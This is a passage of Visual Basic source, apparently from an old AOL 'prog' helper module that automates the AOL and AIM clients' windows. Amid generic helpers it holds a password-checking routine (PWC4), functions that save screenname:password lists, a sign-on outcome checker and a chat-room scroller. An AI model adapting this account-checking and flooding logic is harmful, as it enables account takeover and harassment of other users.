  7277. msgWin& = FindWindow("#32770", "America Online")
  7278. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  7279. If msgBut& <> 0& Then
  7280. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  7281. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  7282. End If
  7283. Loop Until msgWin& = 0&
  7284. pause (0.4)
  7285. PWC4 = False
  7286. Exit Function
  7287. End If
  7288.  
  7289. If soStatic& <> 0& Then
  7290. If InStr(1, soString$, "This account is not currently active") <> 0& Then
  7291. PWC4 = False
  7292. ElseIf InStr(1, soString$, "Invalid account") <> 0& Then
  7293. PWC4 = False
  7294. ElseIf InStr(1, soString$, "You have been disconnected from America Online") <> 0& Then
  7295. Do
  7296. DoEvents
  7297. csWin& = FindWindow("#32770", "America Online")
  7298. csBut& = FindWindowEx(csWin&, 0&, "Button", "OK")
  7299. csStatic& = FindWindowEx(csWin&, 0&, "Static", vbNullString)
  7300. csStatic& = FindWindowEx(csWin&, csStatic&, "Static", vbNullString)
  7301. csString$ = GetText(csStatic&)
  7302. Loop Until csWin& <> 0& And csBut& <> 0& And csStatic& <> 0& And csString$ <> ""
  7303.  
  7304. If InStr(1, csString$, "Your account is signed on using") <> 0& Then
  7305. PWC4 = True
  7306. ElseIf InStr(1, csString$, "This account has been suspended") <> 0& Then
  7307. PWC4 = False
  7308. End If
  7309.  
  7310. Do
  7311. DoEvents
  7312. Call PostMessage(csBut&, WM_KEYDOWN, VK_SPACE, 0&)
  7313. Call PostMessage(csBut&, WM_KEYUP, VK_SPACE, 0&)
  7314. csWin& = FindWindow("#32770", "America Online")
  7315. Loop Until csWin& <> 0&
  7316. End If
  7317. End If
  7318.  
  7319. If soSignOn& <> 0& Then
  7320. PWC4 = False
  7321. End If
  7322. End Function
  7323.  
  7324. Public Function RandomX(length As Long) As String
  7325. 'randomly makes exclamation points
  7326. Dim strX As String, lngRandom As Long, i As Long, strFull As String
  7327.  
  7328. strX$ = "~#@$!@~!@!~!~#$~$!#!~!#@$~!@~!@~!~"
  7329.  
  7330. For i = 1 To length&
  7331. Randomize
  7332.  
  7333. Do
  7334. DoEvents
  7335. lngRandom& = Int(Rnd * 33)
  7336. Loop Until lngRandom& > 0
  7337.  
  7338. strFull$ = strFull$ + Mid(strX$, i, 1)
  7339. Next i
  7340.  
  7341. RandomX = strFull$
  7342. End Function
  7343.  
  7344. Public Sub ReEnterScroll25(times As Long)
  7345. 'simple re-enter scroller
  7346. 'made for aol 2.5 and 3.0
  7347. Dim kai As Long
  7348.  
  7349. Call SetFavorite25("re enter scroll", "aol://2719:2-2-" + GetText(FindRoom25&))
  7350.  
  7351. For kai& = 1 To times&
  7352. Call ChatSend25("h a")
  7353. Call ChatSend25("c k")
  7354. Call ChatSend25("  i")
  7355. Call ChatSend25("t !")
  7356.  
  7357. Call PostMessage(FindRoom25&, WM_CLOSE, 0&, 0&)
  7358.  
  7359. Call RunMenuByString("re enter scroll")
  7360.  
  7361. Do
  7362. DoEvents
  7363. Loop Until Clone_FindRoom25& <> 0&
  7364.  
  7365. Next kai&
  7366. End Sub
  7367.  
  7368. Public Sub RemoveSelectedListItem(list As ListBox)
  7369. 'removes selected list item
  7370. Dim lngSelVar As Long
  7371.  
  7372. lngSelVar& = list.ListIndex
  7373. If lngSelVar& = -1 Then Exit Sub
  7374.  
  7375. list.RemoveItem lngSelVar&
  7376. End Sub
  7377.  
  7378. Public Function ReplaceChr(rText As String, rFind As String, rReplace As String) As String
  7379. 'replaces a character in a string
  7380. Dim rLong As Long, rChr As String, rFull As String
  7381.  
  7382. For rLong& = 1 To Len(rText$)
  7383. rChr$ = Mid(rText$, rLong&, 1)
  7384. If rChr$ = rFind$ Then rChr$ = rReplace$
  7385. rFull$ = rFull$ + rChr$
  7386. Next rLong&
  7387.  
  7388. ReplaceChr$ = rFull$
  7389. End Function
  7390.  
  7391. Public Function ReplaceText(tMain As String, tFind As String, tReplace As String) As String
  7392. 'replaces a string within a larger string
  7393. Dim iFind As Long, lString As String, rString As String, rText As String, tMain2 As String
  7394.  
  7395. iFind& = InStr(1, LCase(tMain$), LCase(tFind$))
  7396. If iFind& = 0& Then ReplaceText = tMain$: Exit Function
  7397.  
  7398. Do
  7399. DoEvents
  7400.  
  7401. lString$ = Left(tMain$, iFind& - 1)
  7402. rString$ = Mid(tMain$, iFind& + Len(tFind$), Len(tMain$) - (Len(lString$) + Len(tFind$)))
  7403. tMain$ = lString$ + "" + tReplace$ + "" + rString$
  7404.  
  7405. iFind& = InStr(iFind& + Len(tReplace$), LCase(tMain$), LCase(tFind$))
  7406. If iFind& = 0& Then Exit Do
  7407. Loop
  7408.  
  7409. ReplaceText = tMain$
  7410. End Function
  7411.  
  7412. Public Function ReplaceText2(tMain As String, tFind As String, tReplace As String) As String
  7413. Dim iFind As Long, lString As String, rString As String, rText As String, tMain2 As String
  7414. 'crappier version of replacetext..
  7415. 'i made it to replace " " with " "
  7416.  
  7417. iFind& = InStr(1, LCase(tMain$), LCase(tFind$))
  7418. If iFind& = 0& Then ReplaceText2 = tMain$: Exit Function
  7419.  
  7420. Do
  7421. DoEvents
  7422.  
  7423. lString$ = Left(tMain$, iFind& - 1)
  7424. rString$ = Mid(tMain$, iFind& + Len(tFind$), Len(tMain$) - (Len(lString$) + Len(tFind$)))
  7425. tMain$ = lString$ + "" + tReplace$ + "" + rString$
  7426.  
  7427. iFind& = InStr(iFind&, LCase(tMain$), LCase(tFind$))
  7428. If iFind& = 0& Then Exit Do
  7429. Loop
  7430.  
  7431. ReplaceText2 = tMain$
  7432. End Function
  7433.  
  7434. Public Sub RestoreWindow(hWnd As Long)
  7435. 'self explanatory
  7436. Call ShowWindow(hWnd&, SW_RESTORE)
  7437. End Sub
  7438.  
  7439. Public Function RightChatText(length As Long) As String
  7440. 'gets text from the right of the chattext
  7441. 'it depends on how long the Length& is
  7442. Dim rWin As Long, rCNTL As Long
  7443. Dim rChr As Long, rChr2 As Long, rText As String
  7444.  
  7445. If AOLVersion = "4" Or AOLVersion = "5" Then
  7446. rWin& = FindRoom&
  7447. rCNTL& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  7448. Else
  7449. rWin& = FindRoom25&
  7450. rCNTL& = FindWindowEx(rWin&, 0&, "_AOL_View", vbNullString)
  7451. End If
  7452.  
  7453. If rCNTL& = 0& Then RightChatText$ = "": Exit Function
  7454.  
  7455. rText$ = GetText(rCNTL&)
  7456.  
  7457. RightChatText$ = Right(rText$, length&)
  7458. End Function
  7459.  
  7460. Public Function RoomCount() As Long
  7461. 'counts the chat room's listbox
  7462. Dim rWin As Long, rList As Long
  7463.  
  7464. rWin& = FindRoom
  7465. If rWin& = 0& Then Exit Function
  7466.  
  7467. rList& = FindWindowEx(rWin&, 0&, "_AOL_Listbox", vbNullString)
  7468. RoomCount& = SendMessage(rList&, LB_GETCOUNT, 0&, 0&)
  7469. End Function
  7470.  
  7471. Public Function RoomCount25() As Long
  7472. 'counts the chat room's listbox on aol 2.5 and 3.0
  7473. Dim rWin As Long, rList As Long
  7474.  
  7475. rWin& = FindRoom25
  7476. If rWin& = 0& Then Exit Function
  7477.  
  7478. rList& = FindWindowEx(rWin&, 0&, "_AOL_Listbox", vbNullString)
  7479. RoomCount25& = SendMessage(rList&, LB_GETCOUNT, 0&, 0&)
  7480. End Function
  7481.  
  7482. Public Sub RunMenu(TopMenu As Long, SubMenu As Long)
  7483. 'this just runs a specified aol menu
  7484. 'to exit aol 4.0.. you'd use:
  7485. 'call runmenu(0&, 12&)
  7486. 'which would goto "&File" and then goto "&Exit"
  7487.  
  7488. Dim aol As Long, menu As Long, sMenu As Long
  7489. Dim mVal As Long, MenuID As Long
  7490.  
  7491. aol& = FindWindow("AOL Frame25", vbNullString)
  7492. menu& = GetMenu(aol&)
  7493. sMenu& = GetSubMenu(menu&, TopMenu&)
  7494. MenuID& = GetMenuItemID(sMenu&, SubMenu&)
  7495.  
  7496. Call SendMessageLong(aol&, WM_COMMAND, MenuID&, 0&)
  7497.  
  7498. End Sub
  7499.  
  7500. Public Sub RunMenuByString(strMenu As String)
  7501. 'this is just 2 for..next loops
  7502. '1 for the topmenu [&File, &Edit, etc..]
  7503. 'and the second for the submenus [&New, &Open, &Signoff, etc..]
  7504. 'don't forget to include the & if part of the menu is underlined..
  7505. 'example:
  7506. 'call runmenubystring("&Sign Off")
  7507. 'note: it is not case sensitive -=]
  7508.  
  7509. Dim aol As Long, AOLMenu As Long, mnuCount As Long
  7510. Dim tMenu As Long, SubMenu As Long, SubCount As Long
  7511. Dim subBuff As String, TopMenu As Long, bottomMenu As Long
  7512. Dim subID As Long
  7513.  
  7514. aol& = FindWindow("AOL Frame25", vbNullString)
  7515. AOLMenu& = GetMenu(aol&)
  7516. mnuCount& = GetMenuItemCount(AOLMenu&)
  7517. For TopMenu& = 0 To mnuCount& - 1
  7518. SubMenu& = GetSubMenu(AOLMenu&, TopMenu&)
  7519. SubCount& = GetMenuItemCount(SubMenu&)
  7520. For bottomMenu = 0 To SubCount& - 1
  7521. subID& = GetMenuItemID(SubMenu&, bottomMenu&)
  7522. subBuff$ = String(100, " ")
  7523. Call GetMenuString(SubMenu&, subID&, subBuff$, 100&, 1&)
  7524. If InStr(1, LCase(subBuff$), LCase(strMenu$)) <> 0& Then
  7525. Call RunMenu(TopMenu&, bottomMenu&)
  7526. Exit Sub
  7527. End If
  7528. Next bottomMenu&
  7529. Next TopMenu&
  7530. End Sub
  7531.  
  7532. Public Sub RunMenuByStringAIM(strMenu As String)
  7533. 'this is just 2 for..next loops
  7534. '1 for the topmenu [&File, &Edit, etc..]
  7535. 'and the second for the submenus [&New, &Open, &Signoff, etc..]
  7536. 'don't forget to include the & if part of the menu is underlined..
  7537. 'example:
  7538. 'call runmenubystring("&Sign Off")
  7539. 'note: it is not case sensitive -=]
  7540.  
  7541. Dim aim As Long, AIMMenu As Long, mnuCount As Long
  7542. Dim tMenu As Long, SubMenu As Long, SubCount As Long
  7543. Dim subBuff As String, TopMenu As Long, bottomMenu As Long
  7544. Dim subID As Long
  7545.  
  7546. aim& = FindWindow("_oscar_buddylistwin", vbNullString)
  7547. AIMMenu& = GetMenu(aim&)
  7548. mnuCount& = GetMenuItemCount(AIMMenu&)
  7549. For TopMenu& = 0 To mnuCount& - 1
  7550. SubMenu& = GetSubMenu(AIMMenu&, TopMenu&)
  7551. SubCount& = GetMenuItemCount(SubMenu&)
  7552. For bottomMenu = 0 To SubCount& - 1
  7553. subID& = GetMenuItemID(SubMenu&, bottomMenu&)
  7554. subBuff$ = String(100, " ")
  7555. Call GetMenuString(SubMenu&, subID&, subBuff$, 100&, 1&)
  7556. If InStr(1, LCase(subBuff$), LCase(strMenu$)) <> 0& Then
  7557. Call RunMenu(TopMenu&, bottomMenu&)
  7558. Exit Sub
  7559. End If
  7560. Next bottomMenu&
  7561. Next TopMenu&
  7562. End Sub
  7563.  
  7564. Public Sub RunTBMenu(Iconnum As Long, MnuNumber As Long)
  7565. 'i really like this sub..
  7566. 'now to explain it:
  7567. 'say you want to click "my member profile"
  7568. 'from aol's toolbar icon 'My AOL'
  7569. '
  7570. 'just put in the icon number it's at [left to right]
  7571. 'and then put the menu number it's at [top to bottom]
  7572. '
  7573. 'so it'd look like this:
  7574. 'call runtbmenu(6&, 4&)
  7575.  
  7576. Dim aol As Long, mdi As Long, tb As Long, TBar As Long
  7577. Dim tIcon As Long, iLong As Long, mLong As Long, StartTime As Double
  7578. Dim tMenu As Long, wVisible As Long, cPosition As POINTAPI
  7579.  
  7580. aol& = FindWindow("AOL Frame25", vbNullString)
  7581. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7582. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  7583. TBar& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  7584.  
  7585. tIcon& = FindWindowEx(TBar&, 0&, "_AOL_Icon", vbNullString)
  7586. For iLong& = 1 To Iconnum - 1
  7587. tIcon& = FindWindowEx(TBar&, tIcon&, "_AOL_Icon", vbNullString)
  7588. Next iLong&
  7589.  
  7590. Call GetCursorPos(cPosition)
  7591. Call SetCursorPos(Screen.Width, Screen.Height)
  7592.  
  7593. ClickAgain:
  7594. StartTime = Timer
  7595. Call PostMessage(tIcon&, WM_LBUTTONDOWN, 0&, 0&)
  7596. Call PostMessage(tIcon&, WM_LBUTTONUP, 0&, 0&)
  7597. pause (0.09)
  7598.  
  7599. Do
  7600. tMenu& = FindWindow("#32768", vbNullString)
  7601. wVisible& = IsWindowVisible(tMenu&)
  7602. Loop Until wVisible& = 1 Or Timer - StartTime > 1
  7603. If Timer - StartTime > 1 Then GoTo ClickAgain
  7604.  
  7605. For mLong& = 1 To MnuNumber&
  7606. Call PostMessage(tMenu&, WM_KEYDOWN, VK_DOWN, 0&)
  7607. Call PostMessage(tMenu&, WM_KEYUP, VK_DOWN, 0&)
  7608. Next mLong&
  7609.  
  7610.  
  7611. Call PostMessage(tMenu&, WM_KEYDOWN, VK_RETURN, 0&)
  7612. Call PostMessage(tMenu&, WM_KEYUP, VK_RETURN, 0&)
  7613. Call SetCursorPos(cPosition.X, cPosition.Y)
  7614.  
  7615. End Sub
  7616.  
  7617. Public Sub Save2Combos(ComboSN As ComboBox, ComboPW As ComboBox, Target As String)
  7618. 'self explanatory
  7619. Dim sLong As Long
  7620. On Error Resume Next
  7621.  
  7622. Open Target$ For Output As #1
  7623. For sLong& = 0 To ComboSN.ListCount - 1
  7624. Print #1, "" + ComboSN.list(sLong&) + ":" + ComboPW.list(sLong&) + ""
  7625. Next sLong&
  7626. Close #1
  7627. End Sub
  7628.  
  7629. Public Sub Save2Lists(ListSN As ListBox, ListPW As ListBox, Target As String)
  7630. 'self explanatory
  7631. Dim sLong As Long
  7632. On Error Resume Next
  7633.  
  7634. Open Target$ For Output As #1
  7635. For sLong& = 0 To ListSN.ListCount - 1
  7636. Print #1, "" + ListSN.list(sLong&) + ":" + ListPW.list(sLong&) + ""
  7637. Next sLong&
  7638. Close #1
  7639. End Sub
  7640.  
  7641. Public Sub SaveCombo(FileName As String, Combo As ComboBox)
  7642. 'self explanatory
  7643. On Error Resume Next
  7644. Dim lngSave As Long
  7645.  
  7646. Open FileName$ For Output As #1
  7647. For lngSave& = 0 To Combo.ListCount - 1
  7648. Print #1, Combo.list(lngSave&)
  7649. Next lngSave&
  7650. Close #1
  7651. End Sub
  7652.  
  7653. Public Sub savelist(FileName As String, list As Control)
  7654. 'self explanatory
  7655. On Error Resume Next
  7656. Dim lngSave As Long
  7657.  
  7658. If FileName$ = "" Then Exit Sub
  7659.  
  7660. Open FileName$ For Output As #1
  7661. For lngSave& = 0 To list.ListCount - 1
  7662. Print #1, list.list(lngSave&)
  7663. Next lngSave&
  7664. Close #1
  7665. End Sub
  7666.  
  7667. Public Sub SaveText(Text As String, FileName As String)
  7668. 'self explanatory
  7669. On Error Resume Next
  7670. Open FileName$ For Output As #1
  7671. Print #1, Text$
  7672. Close #1
  7673. End Sub
  7674.  
  7675. Public Function SelectedListItem(list As ListBox) As Long
  7676. 'function that returns the value
  7677. 'of the selected list item.
  7678. 'if no item is selected, then
  7679. 'the function returns a value
  7680. 'of -1
  7681. SelectedListItem& = list.ListIndex
  7682. End Function
  7683.  
  7684. Public Sub sendim(screenname As String, Message As String)
  7685. 'sends an instant message
  7686. 'to a screen name w/ message
  7687. 'doesn't loop for anything..
  7688. '(msgbox that they're offline)
  7689. Dim aol As Long, mdi As Long, mWin As Long, mBut As Long
  7690. Dim IMWin As Long, imicon As Long, imLong As Long, imCNTL As Long
  7691.  
  7692. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  7693. Call SendIM25(screenname$, Message$)
  7694. Exit Sub
  7695. End If
  7696.  
  7697. aol& = FindWindow("AOL Frame25", vbNullString)
  7698. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7699.  
  7700. Call Keyword("aol://9293:" + screenname$)
  7701.  
  7702. Do
  7703. DoEvents
  7704. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  7705. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  7706. For imLong& = 1 To 8
  7707. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  7708. Next imLong&
  7709. imCNTL& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  7710. Loop Until IMWin& <> 0& And imicon& <> 0& And imCNTL& <> 0&
  7711.  
  7712. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  7713. For imLong& = 1 To 8
  7714. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  7715. Next imLong&
  7716.  
  7717. Call SendMessageByString(imCNTL&, WM_SETTEXT, 0&, Message$)
  7718.  
  7719. Call SendMessage(imicon&, WM_LBUTTONDOWN, 0&, 0&)
  7720. Call SendMessage(imicon&, WM_LBUTTONUP, 0&, 0&)
  7721.  
  7722. End Sub
  7723.  
  7724. Public Sub SendIM25(screenname As String, Message As String)
  7725. 'sends an instant message
  7726. 'to a screen name w/ message
  7727. 'works for 3.0 and 2.5
  7728. 'doesn't loop for anything
  7729. Dim aol As Long, mdi As Long, IMWin As Long, imSN As Long
  7730. Dim IMmessage As Long, IMButton As Long, mWin As Long, mBut As Long, imLong As Long
  7731.  
  7732. aol& = FindWindow("AOL Frame25", vbNullString)
  7733. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7734.  
  7735. 'Call KeyWord25("aol://9293:" + ScreenName$)
  7736. Call RunMenuByString("send an instant message")
  7737.  
  7738. Do
  7739. DoEvents
  7740. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  7741. imSN& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  7742. If AOLVersion = "2.5" Then
  7743. IMmessage& = FindWindowEx(IMWin&, imSN&, "_AOL_Edit", vbNullString)
  7744. Else
  7745. IMmessage& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  7746. End If
  7747. If AOLVersion = "2.5" Then
  7748. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Button", "Send")
  7749. Else
  7750. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  7751. For imLong& = 1 To 8
  7752. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  7753. Next imLong&
  7754. End If
  7755. Loop Until IMWin& <> 0& And IMmessage& <> 0& And IMButton& <> 0&
  7756.  
  7757. Call SendMessageByString(imSN&, WM_SETTEXT, 0&, screenname$)
  7758. Call SendMessageByString(IMmessage&, WM_SETTEXT, 0&, Message$)
  7759.  
  7760. If AOLVersion = "2.5" Then
  7761. Call PostMessage(IMButton&, WM_KEYDOWN, VK_SPACE, 0&)
  7762. Call PostMessage(IMButton&, WM_KEYUP, VK_SPACE, 0&)
  7763. Else
  7764. Call PostMessage(IMButton&, WM_LBUTTONDOWN, 0&, 0&)
  7765. Call PostMessage(IMButton&, WM_LBUTTONUP, 0&, 0&)
  7766. End If
  7767.  
  7768. End Sub
  7769.  
  7770. Public Sub SendMail(screenname As String, Subject As String, Message As String)
  7771. 'sends mail on aol 4.0
  7772. Dim aol As Long, mdi As Long, tb As Long, i As Long
  7773. Dim tTool As Long, tIcon As Long, cWin As Long, cbut As Long
  7774. Dim mWin As Long, mSN As Long, mBCC As Long, mSubj As Long, mMessage As Long, micon As Long
  7775.  
  7776. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  7777. Call SendMail25(screenname$, Subject$, Message$)
  7778. Exit Sub
  7779. End If
  7780.  
  7781. aol& = FindWindow("AOL Frame25", vbNullString)
  7782. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7783.  
  7784. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  7785. tTool& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  7786.  
  7787. tIcon& = FindWindowEx(tTool&, 0&, "_AOL_Icon", vbNullString)
  7788. tIcon& = FindWindowEx(tTool&, tIcon&, "_AOL_Icon", vbNullString)
  7789.  
  7790. Call SendMessage(tIcon&, WM_LBUTTONDOWN, 0&, 0&)
  7791. Call SendMessage(tIcon&, WM_LBUTTONUP, 0&, 0&)
  7792.  
  7793. Do
  7794. DoEvents
  7795. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Write Mail")
  7796. mSN& = FindWindowEx(mWin&, 0&, "_AOL_Edit", vbNullString)
  7797. mBCC& = FindWindowEx(mWin&, mSN&, "_AOL_Edit", vbNullString)
  7798. mSubj& = FindWindowEx(mWin&, mBCC&, "_AOL_Edit", vbNullString)
  7799. mMessage& = FindWindowEx(mWin&, 0&, "RICHCNTL", vbNullString)
  7800. micon& = FindWindowEx(mWin&, 0&, "_AOL_Icon", vbNullString)
  7801. For i = 1 To 13
  7802. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  7803. Next i
  7804. Loop Until mWin& <> 0& And mSubj& <> 0& And mMessage& <> 0& And micon& <> 0&
  7805.  
  7806. Call SendMessageByString(mSN&, WM_SETTEXT, 0&, screenname$)
  7807. Call SendMessageByString(mBCC&, WM_SETTEXT, 0&, "")
  7808. Call SendMessageByString(mSubj&, WM_SETTEXT, 0&, Subject$)
  7809. Call SendMessageByString(mMessage&, WM_SETTEXT, 0&, Message$)
  7810.  
  7811. pause (0.5)
  7812.  
  7813. For i = 1 To 13
  7814. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  7815. Next i
  7816.  
  7817. pause (0.1)
  7818.  
  7819. Call SendMessage(micon&, WM_LBUTTONDOWN, 0&, 0&)
  7820. Call SendMessage(micon&, WM_LBUTTONUP, 0&, 0&)
  7821.  
  7822. End Sub
  7823.  
  7824. Public Sub SendMail25(screenname As String, Subject As String, Message As String)
  7825. 'sends mail on aol 2.5 and 3.0
  7826. Dim aol As Long, mdi As Long
  7827. Dim tTool As Long, tIcon As Long, cWin As Long, cbut As Long
  7828. Dim mWin As Long, mSN As Long, mBCC As Long, mSubj As Long, mMessage As Long, micon As Long
  7829.  
  7830.  
  7831. aol& = FindWindow("AOL Frame25", vbNullString)
  7832. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7833.  
  7834. tTool& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  7835.  
  7836. tIcon& = FindWindowEx(tTool&, 0&, "_AOL_Icon", vbNullString)
  7837. tIcon& = FindWindowEx(tTool&, tIcon&, "_AOL_Icon", vbNullString)
  7838.  
  7839. Call SendMessage(tIcon&, WM_LBUTTONDOWN, 0&, 0&)
  7840. Call SendMessage(tIcon&, WM_LBUTTONUP, 0&, 0&)
  7841.  
  7842. Do
  7843. DoEvents
  7844. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Compose Mail")
  7845. mSN& = FindWindowEx(mWin&, 0&, "_AOL_Edit", vbNullString)
  7846. mBCC& = FindWindowEx(mWin&, mSN&, "_AOL_Edit", vbNullString)
  7847. mSubj& = FindWindowEx(mWin&, mBCC&, "_AOL_Edit", vbNullString)
  7848. If AOLVersion = "3" Then
  7849. mMessage& = FindWindowEx(mWin&, 0&, "RICHCNTL", vbNullString)
  7850. Else
  7851. mMessage& = FindWindowEx(mWin&, mSubj&, "_AOL_Edit", vbNullString)
  7852. End If
  7853. micon& = FindWindowEx(mWin&, 0&, "_AOL_Icon", vbNullString)
  7854. Loop Until mWin& <> 0& And mSubj& <> 0& And mMessage& <> 0& And micon& <> 0&
  7855.  
  7856. Call SendMessageByString(mSN&, WM_SETTEXT, 0&, screenname$)
  7857. Call SendMessageByString(mBCC&, WM_SETTEXT, 0&, "")
  7858. Call SendMessageByString(mSubj&, WM_SETTEXT, 0&, Subject$)
  7859. Call SendMessageByString(mMessage&, WM_SETTEXT, 0&, Message$)
  7860.  
  7861. pause (0.1)
  7862.  
  7863. Call SendMessage(micon&, WM_LBUTTONDOWN, 0&, 0&)
  7864. Call SendMessage(micon&, WM_LBUTTONUP, 0&, 0&)
  7865.  
  7866. End Sub
  7867.  
  7868. Public Sub SetFavorite25(kwName As String, kwKeyWord As String)
  7869. 'sets a favorite on aol 2.5 and 3.0
  7870. 'it sets the favorite in the first
  7871. 'goto menu box ONLY..
  7872. Dim favWin As Long, favEdit1 As Long, favEdit2 As Long, favSave As Long
  7873.  
  7874. Call RunMenuByString("edit go to menu")
  7875.  
  7876. Do
  7877. DoEvents
  7878. favWin& = FindWindow("_AOL_Modal", "Favorite Places")
  7879. favEdit1& = FindWindowEx(favWin&, 0&, "_AOL_Edit", vbNullString)
  7880. favEdit2& = FindWindowEx(favWin&, favEdit1&, "_AOL_Edit", vbNullString)
  7881. favSave& = FindWindowEx(favWin&, 0&, "_AOL_Button", "Save Changes")
  7882. Loop Until favWin& <> 0& And favEdit2& <> 0& And favSave& <> 0&
  7883.  
  7884. Call SendMessageByString(favEdit1&, WM_SETTEXT, 0&, kwName$)
  7885. Call SendMessageByString(favEdit2&, WM_SETTEXT, 0&, kwKeyWord$)
  7886.  
  7887. Call PostMessage(favSave&, WM_KEYDOWN, VK_SPACE, 0&)
  7888. Call PostMessage(favSave&, WM_KEYUP, VK_SPACE, 0&)
  7889.  
  7890. End Sub
  7891.  
  7892. Public Sub SetTextEnter(Text As String, hWnd As Long)
  7893. 'sets text to a specified hWnd as presses enter
  7894. Dim Version As String
  7895.  
  7896. If hWnd& = 0& Or Text$ = "" Or blnOHScroll = False Then Exit Sub
  7897.  
  7898. Call SendMessageByString(hWnd&, WM_SETTEXT, 0&, Chr(9) + Chr(160) + "" + Text$)
  7899. Call SendMessageLong(hWnd&, WM_CHAR, ENTER_KEY, 0&)
  7900.  
  7901. Version$ = AOLVersion
  7902. If Version$ = "4" Or Version$ = "5" Then
  7903. Do
  7904. DoEvents
  7905. Loop Until GetText(hWnd&) = ""
  7906. End If
  7907. End Sub
  7908.  
  7909. Public Sub showaol()
  7910. 'shows aol
  7911. Dim aol As Long
  7912.  
  7913. aol& = FindWindow("AOL Frame25", vbNullString)
  7914. Call ShowWindow(aol&, SW_MINIMIZE)
  7915. Call ShowWindow(aol&, SW_SHOW)
  7916. Call ShowWindow(aol&, SW_MAXIMIZE)
  7917. End Sub
  7918.  
  7919. Public Sub SignOff()
  7920. 'signs user off of aol
  7921.  
  7922. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  7923. Call SignOff25
  7924. Exit Sub
  7925. End If
  7926.  
  7927. Call RunMenuByString("&Sign off")
  7928.  
  7929. Do
  7930. DoEvents
  7931. Loop Until FindSignOnWindow <> 0&
  7932.  
  7933. End Sub
  7934.  
  7935. Public Sub SignOff25()
  7936. 'signs user off of aol 2.5 and 3.0
  7937. Dim aol As Long, mdi As Long, soModal As Long, soButton As Long, gbWin As Long
  7938.  
  7939. aol& = FindWindow("AOL Frame25", vbNullString)
  7940. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7941.  
  7942. Call RunMenuByString("Sign Off")
  7943.  
  7944. Do
  7945. DoEvents
  7946. 'aol 2.5 prompts user before signing off
  7947. soModal& = FindWindow("_AOL_Modal", "America Online")
  7948. soButton& = FindWindowEx(soModal&, 0&, "_AOL_Button", "&Yes")
  7949. 'where-as aol 3.0 just signs off normally
  7950. gbWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye from America Online!")
  7951. If gbWin& <> 0& Then
  7952. Exit Sub
  7953. End If
  7954. Loop Until soModal& <> 0& And soButton& <> 0&
  7955.  
  7956. Call SendMessage(soButton&, WM_KEYDOWN, VK_SPACE, 0&)
  7957. Call SendMessage(soButton&, WM_KEYUP, VK_SPACE, 0&)
  7958.  
  7959. Do
  7960. DoEvents
  7961. gbWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye from America Online!")
  7962. Loop Until gbWin& <> 0&
  7963.  
  7964. End Sub
  7965.  
  7966. Public Function SignOnQuick(screenname As String, Password As String) As Long
  7967. 'signon outcomes...
  7968. '1 = signed on correctly
  7969. '2 = incorrect password
  7970. '3 = currently signed on
  7971. '4 = invalid acct (not active) / (suspended)
  7972. '5 = internal account
  7973.  
  7974. On Error Resume Next
  7975.  
  7976. Dim aol As Long, mdi As Long, welWin As Long, gWin As Long
  7977. Dim gCNTL As Long, iWin As Long, iEdit As Long
  7978. Dim gString As String, msgWin As Long, msgBut As Long
  7979. Dim iBut As Long, soWin As Long, soCombo As Long
  7980. Dim soBut As Long, soButx As Long, soEdit As Long, soCNTL As Long
  7981. Dim lngCombo As Long, conModal As Long, modPWStore As Long
  7982.  
  7983. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  7984. SignOnQuick = SignOnQuick25(screenname$, Password$)
  7985. Exit Function
  7986. End If
  7987.  
  7988. If GetUser <> "" Then
  7989. Call SignOff
  7990. If IsNumeric(GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini")) = True Then
  7991. pause (GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini"))
  7992. End If
  7993. End If
  7994.  
  7995. Do
  7996. DoEvents
  7997. aol& = FindWindow("AOL Frame25", vbNullString)
  7998. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7999. soWin& = FindSignOnWindow
  8000. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  8001. soBut& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  8002. soBut& = FindWindowEx(soWin&, soBut&, "_AOL_Icon", vbNullString)
